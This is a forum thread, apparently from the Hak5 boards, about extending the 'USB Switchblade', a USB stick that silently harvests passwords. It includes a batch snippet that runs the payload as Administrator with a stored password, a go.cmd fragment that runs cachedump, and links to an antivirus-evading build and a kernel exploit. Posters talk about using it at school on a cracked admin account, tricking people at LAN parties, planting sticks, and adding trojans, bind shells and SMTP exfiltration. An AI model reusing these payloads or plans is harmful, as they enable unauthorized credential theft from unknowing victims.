USB Switchblade Development

[spektormax]

hey, I made a very small modification to the stick.

First of all I'm using his at school, but I magicly got the admin password *cough ophcrack* so I have moddified to run a batch file (I have a U3 but I dont use the U3 method scince u'd need to have the admin privalges).

Heres my modified Batch:

cd WIPCMD

runas /user:Administrator go.cmd < admin.txt

What this does is basicly perform the Windows XP/2000 command which runs a program as a diffrent user, and tell it to run the same go.cmd file except as administrator. The admin.txt file simply contains the password to log in as.

The secound slight modification that I made is I added cachedump to the list of things to run. Cachedump will basicly do what pwdump2 does on the local computer execpt it steals the cached Domain credencials. I wasn't sure wether or not it trip some virus scanners (tired the normal one with NOD32 and it didn't but who knows) so I used "the brainkill method" of making it undetectable, The original file is here: http://www.off-by-one.net/misc/cachedump-1.2.zip heres the one that is totaly undetectable: http://unpluggedpodcast.com/spektormax/cachedump.exe Irongeek has a nice tutorial on using cachedump as well as how to crack it with a moddified version of Jhon the Ripper or a semi-hack for cain&abel here: http://www.irongeek.com/i.php?page=security/cachecrack

Heres my slightly moddified go.cmd file that makes the cachedump results look nice:

... [continued from file] ... 

echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***************[MS-CACHE]*********** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .cachedump.exe >> Documentslogfiles%computername%.log 2>&1

:End

exit

[Darren Kitchen]

Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hirens Boot CD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's very "nubish" utility yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, yet it will reset the password for you with a few keyboard strokes. Badda-bing Badda-boom your in the box with Administrator access.

I have not yet found a windows machine it doesn't work on. Only drawback would be that if someone has a CMOS/BIOS password on the box and you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...

We've got something in the works. All I'll say. But thats another hack entirely. The idea behind this hack is that you can be at a LAN Party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey think i could get a copy of that album / expense report template / pr0n" and bingo, you got them to hack themselves.

[psichonico]

I just tried Amish's version of the switchblade and im just wondering why is there no PWDump and also will PWDump be accessbile soon

[DLSS]

Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hirens Boot CD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's very "nubish" utility yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, yet it will reset the password for you with a few keyboard strokes. Badda-bing Badda-boom your in the box with Administrator access.

I have not yet found a windows machine it doesn't work on. Only drawback would be that if someone has a CMOS/BIOS password on the box and you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...

We've got something in the works. All I'll say. But thats another hack entirely. The idea behind this hack is that you can be at a LAN Party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey think i could get a copy of that album / expense report template / pr0n" and bingo, you got them to hack themselves.

in that method would it not just be easy to put a packaged trojan (like one of my fav's cia 1.3 (a classic :D) and autorun it ?

those also have future's like when connected to the net connect to .... .no-ip.com etc , u can even get it to mail u the ip adress when someone gets online .... and it dont get detected -> see http://hak5.org/forums/viewtopic.php?p=30398

[Loony Guitarist]

You can get more programs that you can put into the script from www.nirsoft.net

Is there a program that will grab the lm hashes for this? I couldint find one on there site.

The other programs work like a charm though almost scary. it even grabed my gmail account and password.

[SomeoneE1se]

I think we are going to need two diffrent payloads, one stealth and one pwner.. If you have someone who is tight into securty and they see a account created, or a somthing droped on their computer you're boned because now their pissed and looking for you. But if you only take stuff off the computer there should be really no way to tell...

[Guest MaxDamage]

...

[SomeoneE1se]

Hey all

When I put together the proof of concept U3 hack I wasn’t thinking it would get much attention so it is a bit primitive and kind of script kiddie. I gave it to Darren to see what he thought. I didn’t realise it would be so much fun to talk about and see Darren demo.

So I was thinking, How about we re-write it a bit better this time. I think it would be quite cool to evolve it a bit.

Some suggestions:

Works on U3 and USB

Automatic privilege escalation from any user to Admin

A real bind shell as well as the account adding and hiding.

Re-compile pwdump4 with new variables so none of the virus checkers find it.

A phone home option that can detect or create an SMTP server to send the results.

A switch to make it a passive as apposed to active hack.

Improve stealth and speed

Give it the ability to run bolt on’s such as anything you guys can think of.

An automated switchblade build routine.

And so on…… Hmmm maybe my black hat is showing sorry. :oops:

OK, back to gray.

It might be fun to do it together with all the skills we have we could make an awesome tool.

I have already written some of the above and am happy to share.

My only reservation is I don’t want this to tun into a real work type project. Just a bit of fun that mabe we could develop something that could be used in another segment.

What do you guys think?

_________________

MaxDamage

Max's Law: "Murphy was an Optimist!"

I'm with you.... and a way to switch it from passive to active and then back would really be helpful (sadly I know just about nothing about this but I'd love to help so if you can recomend some reading to bring my 1337 skillz up to where they need to be, that would be great meanwile off to google)

... murphy was totaly an optimist

[spudgun_uk]

Anyone else getting this?

It's picking up everything else, it's picking up whoever logged in lasts password, (i'm currently testing it out on my home network, I've tried on 2 boxes and am getting the same error), although it's not giving passwords for all accounts. I'm running the one which is intended for the U3, but just running directly off a STANDARD usb stick. Is this why I'm getting the error? The other hack doesn't seem to have a password grabber.. or account escalation facility.. Sorry to sound so n00b ;)

Hope someone can help ...

-Kyle

[nachtfrau]

We've got something in the works. All I'll say. But thats another hack entirely. The idea behind this hack is that you can be at a LAN Party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey think i could get a copy of that album / expense report template / pr0n" and bingo, you got them to hack themselves.

I understand the concept completly. It was just another suggestion to try if you really don't need/want the password to the box your trying to pwn. I just like to give alternatives to the same solution.

Just trying to help :D

[lunytunz42]

I am not sure if this will help, I found a POC on the Sploitcast forums that looks promising.

http://www.milw0rm.com/exploits/1911

I am hoping this will be of some use to a real coder and help the project along.

:twisted:

[staulkor]

pspv.exe is blowing up on me. Im getting an "Application Error" on 0xc0000142...

[Sloth]

So obviously bigger is always better, (at least in my opinion) but I was just wondering what size U3 stick everyone is running? does the 256mb U3 sticks work rather well or is there just not enough room for all the fun stuff and then all those logs you been packing on there. Is the 2 or 4gig sticks just way to big and dare I say it over kill? Just wondering what the general consensus is on size before I go buying a bunch to leave laying around places.

Edit: also what sizes are being used for the standard USB sticks? got a couple free 64meg ones layin about.

-Sloth

[Logue]

Yeah, I was wondering the same thing as Sloth. How big a stick should I get? I don't have one yet, and wanted to get one that was sufficient to get all of this done, but not blow the bank. Are the 1+GB ones overkill?

[cooper]

I am not sure if this will help, I found a POC on the Sploitcast forums that looks promising.

http://www.milw0rm.com/exploits/1911

I am hoping this will be of some use to a real coder and help the project along.

:twisted:

:shock: Holy crap! Ring0 exploit. Remember that scene in Hackers where they're collectively attacking The Gibson, and that admin says "They're in the kernel"? That's what seems to be happening here.

Though it seems that by default the memory used is read-only protected, mitigating things somewhat.

I'm always fascinated by exploits like these. I mean, how the HELL did they figure out what IOCTL 0x141043 does? Or that it even existed for that matter...

[xFilthyxJesusx]

So i dont have one of those spiffy U3 flash drives. So I'm using Amish's solution.

I've added onto it. Adding retrieving the product key, listing open ports, things that run at start up, services, Mozilla cookie retrieve. Network adapter into, installed windows updates, running processes, internet explorer remembered passwords blah blah blah...

But besides that. Im wondering what i can use to get the LM Hashes. like pwdump. and so on. Is someone or can someone help me out with this. Id like to be able to make the non U3 drive competable with the U3 drive or at least get as much as i can out of it.

Oh and if anyone would like the version of Amish's solution that i made let me know I'll post it up.

[sars960]

Hey man I feel famous LOL. Seriously thanks for the credit Darren. 8)

When I developed the first payload it was just a proof of concept put together in half an hour as soon as I found out how to replace the U3 iso. Anywaz since then I have written some more, and refined it a bit. I have also got a bolt on, that silently finds the local smtp server (or builds its own if directly connected) and emails the results.

So If you guys want to help develop it further I’m up for it. And if you need help getting it running then just ask :).

I also have a nun U3 version somthing like Amesh'e that I could add if you need it.

yea, if you could put up your non u3 version, i don't have a U3 version, please post your files!

[Ouroboros]

Not trying to be a distration, but U3 just posted an application packager to make life easier to make an install package for U3.

http://devblog.u3.com/?p=34

They sure are making our lives easier.

[Sunari]

Hello Everyone!!

New to the boards.. but i've been watching hak5 for quite some time

Now that the introductions are done :P

I was wondering if it would be possible to add in a part to the batch file that would change a value in the local policy editor, sepcifically the one that sets the priveledges back to classic to open up doors for fastpush..

[datamancer]

Hey Long time listner first time poster (obviously)

Alright i bought the sandisk "Switch blade" 512mb card and ran the u3 install thing. I copied the payload into the flash drive, but the problem i have is the autorun will not work. So i go to reinstall it and i get an error.

When i view the CD drive created by the flash drive i cannot see the insides because when i double click on it i get an error "Cannot access drive may be corrupt" Did i fubar my flash drives v3 tech? Help!

The install error i get "Reformatting of the smart drive failed the drive may be unusable, you might be able to recovor by rerunning this software"

[flick650]

Yet another first time poster, long time listener.

It seems we are all coming out of the woodwork for this one.

I have been having the same problem as other people on this forum, a few people earlier posted about a pwdump error. I had the same. every PC i tried it on I received the following error:

Logon to 127.0.0.1ADMIN$ failed: code 53

The fix for this is simple, go to http://www.foofus.net/fizzgig/pwdump/ and get the latest pwdump, then replace the one on the key with the new one and run. It fixed the problem for me and it dumped my hashes happily.

I was using the encrypted payload that gets around Norton, I do not know whether norton picks this one up. I know that AVG does not however.

Oh and I have a feature request. If anyone can come up with this I will be very happy.

It should be possible to get the payload to dump Wireless Keys from the WZC service, so you can easily get WEP and WPA passwords. Cain & Abel does it but I was wondering if there was a way of doing it in the command line.

[xFilthyxJesusx]

Ok so here is my little modification

For those of you that would like to help my rapidshare.

http://rapidshare.de/files/32353339/PCInfo.rar.html

But I know its annoying and some people cannot download from rapidshare so

http://www.fileden.com/files/2006/7/8/116430/PCInfo.rar

Any problems or feedback let me know. :-)

[xFilthyxJesusx]

Hello Everyone!!

New to the boards.. but i've been watching hak5 for quite some time

Now that the introductions are done :P

I was wondering if it would be possible to add in a part to the batch file that would change a value in the local policy editor, sepcifically the one that sets the priveledges back to classic to open up doors for fastpush..

Oh I think I just read something about that today. Ill try searching and do an edit if i find it.

EDIT:

Yup here it is http://www.hak5.org/forums/viewtopic.php?t=2412

I have written the admin of the site to see if I can get anymore information about the tool.

[Xbaxe]

First time posting , first time listening =)

Ive got a question about this .... I personally have not tried out the payloads yet , but from what i have been reading , this requires administrator access right ? But , in a real working corporateschool enviroment , just how many people would be logged in as root ? We would need priviledge escalation as well right ?

Could anyone point me to some existing priveldge escalation payloads ? Im having some trouble finding existing packages .

( Sorry if im way off-target on this one . Forgive my n33bishness )

[xFilthyxJesusx]

First time posting , first time listening =)

Ive got a question about this .... I personally have not tried out the payloads yet , but from what i have been reading , this requires administrator access right ? But , in a real working corporateschool enviroment , just how many people would be logged in as root ? We would need priviledge escalation as well right ?

Could anyone point me to some existing priveldge escalation payloads ? Im having some trouble finding existing packages .

( Sorry if im way off-target on this one . Forgive my n33bishness )

As Sunari was asking for the same thing. There doesnt seem to be one yet. At least that I am aware of.

I am currently trying to figure out a way to do that to the non U3 version